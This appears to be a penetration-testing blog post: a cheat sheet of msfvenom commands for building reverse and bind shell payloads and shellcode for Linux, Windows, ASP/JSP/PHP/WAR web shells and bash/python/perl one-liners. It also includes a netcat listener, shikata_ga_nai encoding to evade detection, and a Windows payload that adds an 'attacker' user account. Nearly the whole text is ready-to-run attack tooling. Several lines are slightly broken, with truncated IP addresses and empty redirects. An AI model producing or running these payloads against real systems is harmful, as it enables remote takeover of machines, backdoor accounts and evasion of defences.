Msfvenom Cheat Sheet

2 minute read

Msfvenom cheat sheet for generating shellcode and payloads.


Meterpreter based payloads require the use of the exploit/multi/handler module to catch the shell within the msfconsole.

This can be set up easily using this simple bash script I wrote

  _             _ _         
 | |_ ___ ___ _| | |___ ___ 
 |   | .'|   | . | | -_|  _|

usage: ./ <payload> <ip> <port>

common payloads:
windows/meterpreter/reverse_tcp       windows/x64/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp     linux/x86/metepreter/reverse_tcp
generic/shell_reverse_tcp             php/metepreter/reverse_tcp

Payloads generated that do not include meterpreter can still be caught using msfconsole exploit/multi/handler. Netcat is a solid alternative and shells obtained via netcat can be easily upgraded to meterpreter sessions.

A basic Netcat listener goes as follows:

root@kail:~# nc -nlvp <port>    // Specify lport

Msfvenom ~ Shellcode

Linux Shellcode

// -b badchars will vary for exploit development
msfvenom -p linux/x86/shell_reverse_tcp LHOST=AttackerIP LPORT=port -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20"
msfvenom -p linux/x86/shell_bind_tcp RHOST=TargetIP LPORT=port -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20"

Windows Shellcode

// -b badchars will vary for exploit development
msfvenom -p windows/shell_reverse_tcp LHOST=AttackerIP LPORT=port EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
msfvenom -p windows/shell_bind_tcp RHOST=TargetIP LPORT=port EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Msfvenom ~ Payloads

Linux Payloads

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=AttackerIP LPORT=port -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=AttackerIP LPORT=port -f elf > shell.elf

msfvenom -p generic/shell_bind_tcp RHOST=AttackerIP LPORT=port -f elf > shell.elf                               
msfvenom -p generic/shell_reverse_tcp LHOST=AttackerIP LPORT=port -f elf > shell.elf

msfvenom -p linux/x86/shell/reverse_tcp LHOST=AttackerIP LPORT=port -f elf > shell.elf
msfvenom -p linux/x86/shell/bind_tcp RHOST=TargetIP LPORT=port -f elf > shell.elf

Windows Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=AttackerIP LPORT=port -f exe > reverse.exe
msfvenom -p windows/meterpreter/bind_tcp RHOST=TargetIP LPORT=port -f exe > bind.exe
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
msfvenom -p windows/shell/reverse_tcp LHOST=AttackerIP LPORT=port -f exe > prompt.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=AttackerIP LPORT=port -e shikata_ga_nai -i 3 -f exe > encoded.exe

Web Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0. LPORT=1234 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.1. LPORT=443 -f raw > shell.jsp
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0. LPORT=443 -f raw > shell.php
msfvenom -a x86 --platform windows -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -f raw > shell.php

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0. LPORT=443 -f war > shell.war

//Extracting jsp value from shell.war:
#jar -xvf shell.war  // You'll get the jsp file e.g. ehfwj64g.jsp
// If you can upload a .war to a web application, you can execute the jsp by going to 
// the upload dir & using the extracted .jsp file to tigger the shell:  


Scripting Payloads

msfvenom -p cmd/unix/reverse_python LHOST=10.11.0. LPORT=443 -f raw >    
msfvenom -p cmd/unix/reverse_bash LHOST=10.11.0. LPORT=443 -f raw >    
msfvenom -p cmd/unix/reverse_perl LHOST=10.11.0. LPORT=443 -f raw >    
msfvenom -p linux/x86/shell_reverse_tcp -f js_le LHOST=10.11.0. LPORT=443  // javascript ~ little endian